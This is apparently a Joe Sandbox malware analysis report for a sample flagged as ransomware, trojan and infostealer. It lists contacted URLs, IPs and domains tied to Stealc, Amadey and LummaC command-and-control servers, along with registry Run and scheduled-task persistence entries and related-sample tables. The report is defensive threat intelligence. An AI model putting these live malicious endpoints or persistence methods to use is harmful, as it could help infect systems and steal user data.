http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php0	stealc_default2.exe, 00000014.00000002.3033783708.00000000016D2000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php3	stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id21ResponseD	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000031E6000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://locatedblsoqp.shop/	BitLockerToGo.exe, 00000016.00000003.2982516749.0000000003275000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php-	stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.00000000016D2000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tmpfiles.org/dl/12041962/gh941.batbec	Amadeus.exe, 00000025.00000002.3381015280.0000000003470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpE	stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id10ResponseD	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/ows	axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php;	stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id5Response	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodeda	axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://tempuri.org/Entity/Id10Response	RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id8Response	RegAsm.exe, 00000009.00000002.2842758634.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/Amadeus.exe5c7cf18	axplong.exe, 00000006.00000002.3411734873.0000000005A90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/d	axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://traineiwnqo.shop/apim:b	BitLockerToGo.exe, 00000016.00000002.3001288406.0000000003232000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpa	stealc_default2.exe, 00000014.00000002.3033783708.00000000016C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.s	pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000025F3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/	Amadeus.exe, 00000025.00000002.3374560965.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.26/ws	Hkbsse.exe, 0000002D.00000002.3378115953.0000000000A25000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://evoliutwoqm.shop/api	BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266901207.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/Jo89Ku7d/index.phpST.	axplong.exe, 00000006.00000002.3380519963.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/D	RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp, 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.58.114.223	unknown	Russian Federation	197695	AS-REGRU	false
185.215.113.26	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
104.21.21.16	tmpfiles.org	United States	13335	CLOUDFLARENETUS	false
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
95.179.250.45	unknown	Netherlands	20473	AS-CHOOPAUS	true
188.114.97.3	femininedspzmhu.shop	European Union	13335	CLOUDFLARENETUS	true
52.212.52.84	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com	United States	16509	AMAZON-02US	false
65.21.18.51	unknown	United States	199592	CP-ASDE	true
188.114.96.3	locatedblsoqp.shop	European Union	13335	CLOUDFLARENETUS	true
69.57.172.44	cgil.in	United States	25653	FORTRESSITXUS	false
162.159.134.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502213
Start date and time:	2024-08-31 15:42:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	49
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OmnqazpM3P.exe renamed because original name is a hash value
Original Sample Name:	51abf67011f60975d76946357ee94a48.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@76/90@10/13
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 67% Number of executed functions: 379 Number of non-executed functions: 75
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.159.2, 20.190.159.64, 20.190.159.68, 40.126.31.69, 20.190.159.4, 40.126.31.67, 40.126.31.73, 20.190.159.0
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target OmnqazpM3P.exe, PID 6664 because it is empty
Execution Graph export aborted for target axplong.exe, PID 6532 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:44:01	API Interceptor	51360x Sleep call for process: axplong.exe modified
09:44:15	API Interceptor	35x Sleep call for process: RegAsm.exe modified
09:44:20	API Interceptor	10x Sleep call for process: 6rxotqIg7H.exe modified
09:44:33	API Interceptor	3x Sleep call for process: BitLockerToGo.exe modified
09:44:48	API Interceptor	11x Sleep call for process: BitcoinCore.exe modified
09:44:50	API Interceptor	1x Sleep call for process: runtime.exe modified
09:44:52	API Interceptor	148x Sleep call for process: Amadeus.exe modified
09:45:00	API Interceptor	90x Sleep call for process: Hkbsse.exe modified
15:43:05	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
15:44:11	Task Scheduler	Run new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
15:44:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Amadeus.exe C:\Users\user\1000238002\Amadeus.exe
15:44:55	Task Scheduler	Run new task: Statistics path: wscript s>//B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
15:45:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Amadeus.exe C:\Users\user\1000238002\Amadeus.exe
15:45:12	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.58.114.223	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	194.58.114.223/d/525403
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	194.58.114.223/d/525403
	file.exe	Get hash	malicious	Cryptbot	Browse	194.58.114.223/d/385104
	file.exe	Get hash	malicious	Cryptbot	Browse	194.58.114.223/d/385104
	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Get hash	malicious	Amadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, Vidar	Browse	194.58.114.223/d/525403
	file.exe	Get hash	malicious	DarkTortilla, Neoreklami	Browse	194.58.114.223/d/385121
	SecuriteInfo.com.Trojan.Inject5.6732.13710.8794.exe	Get hash	malicious	Cryptbot, Neoreklami	Browse	194.58.114.223/d/385104
	FySc2FzpA8.exe	Get hash	malicious	Go Injector	Browse	194.58.114.223/d/525403
185.215.113.26	Original_Build.exe	Get hash	malicious	Raccoon Stealer v2	Browse	185.215.113.26/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
104.21.21.16	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse
	KMPrEVaSfH.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse
	New_Text_Document_mod.exse.exe	Get hash	malicious	AgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoader	Browse
	https://aeindo.co.id/cvt/	Get hash	malicious	Unknown	Browse
	https://kurindubaitullah.com/lpwx00	Get hash	malicious	Unknown	Browse
	doc0987654321u.exe	Get hash	malicious	Unknown	Browse
	starter.sh	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdn.discordapp.com	SI_56127.vbs	Get hash	malicious	Remcos	Browse	162.159.130.233
	CAN_POST2617276.vbs	Get hash	malicious	Remcos	Browse	162.159.134.233
	CAN_POST7865678.vbs	Get hash	malicious	AsyncRAT	Browse	162.159.134.233
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	162.159.130.233
	http://relay.csgoze520.com/	Get hash	malicious	Unknown	Browse	162.159.133.233
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	162.159.130.233
	payment PAGO 2974749647839452.js	Get hash	malicious	FormBook	Browse	162.159.129.233
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	162.159.130.233
	INQUIRY#46789-AUG24.js	Get hash	malicious	AgentTesla	Browse	162.159.129.233
	227979659-051450-sanlccjavap0004-13413.exe	Get hash	malicious	GuLoader	Browse	162.159.130.233
femininedspzmhu.shop	0calendarscope.exe	Get hash	malicious	LummaC, Go Injector	Browse	188.114.96.3
femininedspzmhu.shop	0calendarscope.exe	Get hash	malicious	LummaC, Go Injector	Browse	188.114.97.3
locatedblsoqp.shop	IrisMichael263Fiona.lib.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	26oGUTrmHt.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	eve2kFNLD6.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	kddDxssc29.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
tmpfiles.org	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	104.21.21.16
	KMPrEVaSfH.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	104.21.21.16
	SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse	104.21.21.16
	New_Text_Document_mod.exse.exe	Get hash	malicious	AgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoader	Browse	104.21.21.16
	https://aeindo.co.id/cvt/	Get hash	malicious	Unknown	Browse	104.21.21.16
	https://pmb.stitmakrifatulilmi.ac.id/scv/	Get hash	malicious	HTMLPhisher	Browse	172.67.195.247
	https://central-lab.by/rstc/	Get hash	malicious	Unknown	Browse	172.67.195.247
	https://kurindubaitullah.com/lpwx00	Get hash	malicious	Unknown	Browse	104.21.21.16
jirafasaltas.fun	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	PQ2AUndsdb.exe	Get hash	malicious	Amadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	188.114.97.3
	SecuriteInfo.com.Win64.DropperX-gen.21682.4890.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Win64.CrypterX-gen.4166.17445.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Win64.DropperX-gen.4383.5748.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win64.CrypterX-gen.4166.17445.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win64.MalwareX-gen.19968.21519.exe	Get hash	malicious	Unknown	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	wfJfUGeGT3.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
CLOUDFLARENETUS	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SecuriteInfo.com.Trojan.Win64.Krypt.13435.32435.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	play.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	BankPaymAdviceVend.Report.docx	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.96.3
	https://emp.eduyield.com/el?aid=28gedda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/innhanhanhsang.com.vn/.dev/RgZNq3Jz/a2ltLmZvcmRAcmF2ZWlzLmNvbQ==$%C3%A3%E2%82%AC	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	wfJfUGeGT3.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	188.114.96.3
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	wfJfUGeGT3.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
AS-REGRU	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	194.58.114.223
	Payment_Advice.exe	Get hash	malicious	FormBook, GuLoader	Browse	37.140.192.207
	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse	194.58.112.174
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	INVG0088 LHV3495264 BL327291535V.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	Quote 1T PN40 082624.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	37.140.192.213
	Cotizaci#U00f3n 22_08_2024.exe	Get hash	malicious	FormBook	Browse	37.140.192.179
	http://successguilddi.info/	Get hash	malicious	Unknown	Browse	37.140.192.111
	PI#220824.exe	Get hash	malicious	FormBook	Browse	31.31.198.36

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	BankPaymAdviceVend.Report.docx	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3 188.114.96.3
	IrisMichael263Fiona.lib.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 188.114.96.3
	https://seoservicesiox.firebaseapp.com/&err=b0qmbz0rr7j7jwfxwuge?err=am30dbsswi0	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Vidar	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Stealc, Vidar	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Vidar	Browse	188.114.97.3 188.114.96.3
37f463bf4616ecd445d4a1937da06e19	deadlock-aimbot-run.exe	Get hash	malicious	Unknown	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, Stealc, Vidar	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	sharp.exe	Get hash	malicious	Unknown	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	sharp.exe	Get hash	malicious	Unknown	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	SecuriteInfo.com.FileRepMalware.18455.13769.exe	Get hash	malicious	GuLoader	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	10OyRBv3Qo.hta	Get hash	malicious	Unknown	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	file.exe	Get hash	malicious	Vidar	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	kqS23MOytx.exe	Get hash	malicious	Socks5Systemz, Stealc, Vidar, XWorm, Xmrig	Browse	104.21.21.16 69.57.172.44 162.159.134.233
	Thermo Fisher RFQ_TFS-1207.com.exe	Get hash	malicious	GuLoader	Browse	104.21.21.16 69.57.172.44 162.159.134.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Vidar	Browse
